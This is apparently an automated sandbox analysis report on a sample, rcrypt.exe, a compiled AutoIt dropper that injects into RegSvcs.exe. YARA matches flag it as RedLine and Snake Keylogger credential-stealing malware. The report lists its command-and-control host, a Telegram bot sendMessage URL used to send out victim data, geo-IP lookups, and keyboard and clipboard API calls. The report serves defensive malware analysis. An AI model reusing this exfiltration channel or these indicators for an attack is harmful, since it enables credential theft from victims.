Source: RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:849224%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.3772899142.0000000003113000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.000000000306F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003025000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.3772899142.0000000003025000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: RegSvcs.exe, 00000002.00000002.3772899142.000000000304C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003025000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: RegSvcs.exe, 00000002.00000002.3772899142.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3776103096.0000000005433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.3774685263.0000000004238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.3772899142.0000000003113000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.0000000003104000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3772899142.000000000306F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.3772899142.000000000310E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49725 version: TLS 1.2

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0016425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0016425A

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00164458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00164458

Source: C:\Users\user\Desktop\rcrypt.exe

0_2_0016425A

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00150219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00150219

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0017CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0017CDAC

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.rcrypt.exe.33b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2a79a56.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2e60000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2e60000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2a79a56.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2b60ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2a7a93e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2b60000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2b60ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2b60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2a7a93e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1319524168.00000000033B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.3772038405.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3769801925.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.3772636346.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.3772208860.0000000002B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 7692, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: This is a third-party compiled AutoIt script.	0_2_000F3B4C
Source: rcrypt.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: rcrypt.exe, 00000000.00000000.1302519170.00000000001A5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_07c69189-3
Source: rcrypt.exe, 00000000.00000000.1302519170.00000000001A5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8d1a57b8-5
Source: rcrypt.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_44a6db8d-3
Source: rcrypt.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e5781092-4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00154021: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00154021

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_00148858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00148858

Source: C:\Users\user\Desktop\rcrypt.exe

Code function: 0_2_0015545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0015545F

Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_000FE800	0_2_000FE800
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0011DBB5	0_2_0011DBB5
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0017804A	0_2_0017804A
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_000FE060	0_2_000FE060
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00104140	0_2_00104140
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00112405	0_2_00112405
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00126522	0_2_00126522
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0012267E	0_2_0012267E
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00170665	0_2_00170665
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0011283A	0_2_0011283A
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00106843	0_2_00106843
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_001289DF	0_2_001289DF
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00108A0E	0_2_00108A0E
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00126A94	0_2_00126A94
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00170AE2	0_2_00170AE2
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00158B13	0_2_00158B13
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0014EB07	0_2_0014EB07
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0011CD61	0_2_0011CD61
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00127006	0_2_00127006
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0010710E	0_2_0010710E
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00103190	0_2_00103190
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_000F1287	0_2_000F1287
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_001133C7	0_2_001133C7
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0011F419	0_2_0011F419
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00105680	0_2_00105680
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_001116C4	0_2_001116C4
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_001178D3	0_2_001178D3
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_001058C0	0_2_001058C0
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00111BB8	0_2_00111BB8
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00129D05	0_2_00129D05
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_000FFE40	0_2_000FFE40
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_00111FD0	0_2_00111FD0
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_0011BFE6	0_2_0011BFE6
Source: C:\Users\user\Desktop\rcrypt.exe	Code function: 0_2_016F35F0	0_2_016F35F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00408C60	2_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040DC11	2_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00407C3F	2_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418CCC	2_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00406CA0	2_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004028B0	2_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0041A4BE	2_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418244	2_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00401650	2_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F20	2_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004193C4	2_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00418788	2_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402F89	2_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00402B90	2_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004073A0	2_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_029112B0	2_2_029112B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_029112C0	2_2_029112C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0291154F	2_2_0291154F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02911560	2_2_02911560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFB300	2_2_02EFB300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EF9318	2_2_02EF9318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EF41E2	2_2_02EF41E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFC160	2_2_02EFC160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFC43F	2_2_02EFC43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFB5E0	2_2_02EFB5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFBBA1	2_2_02EFBBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFB8C0	2_2_02EFB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFD890	2_2_02EFD890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EF5820	2_2_02EF5820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFBE7F	2_2_02EFBE7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFAE58	2_2_02EFAE58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EF5E58	2_2_02EF5E58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EF3069	2_2_02EF3069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFB020	2_2_02EFB020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFF4C8	2_2_02EFF4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFD881	2_2_02EFD881
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFE9E8	2_2_02EFE9E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFE9D8	2_2_02EFE9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_02EFF92B	2_2_02EFF92B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B4150	2_2_053B4150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B9198	2_2_053B9198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B8450	2_2_053B8450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B0040	2_2_053B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B0C90	2_2_053B0C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B1388	2_2_053B1388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B1A88	2_2_053B1A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BED38	2_2_053BED38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BED28	2_2_053BED28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B4143	2_2_053B4143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BC1B8	2_2_053BC1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BF190	2_2_053BF190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B9188	2_2_053B9188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BF181	2_2_053BF181
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BF5E8	2_2_053BF5E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BF5D8	2_2_053BF5D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BC1C8	2_2_053BC1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BE030	2_2_053BE030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BE020	2_2_053BE020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053B0006	2_2_053B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_053BE478	2_2_053BE478
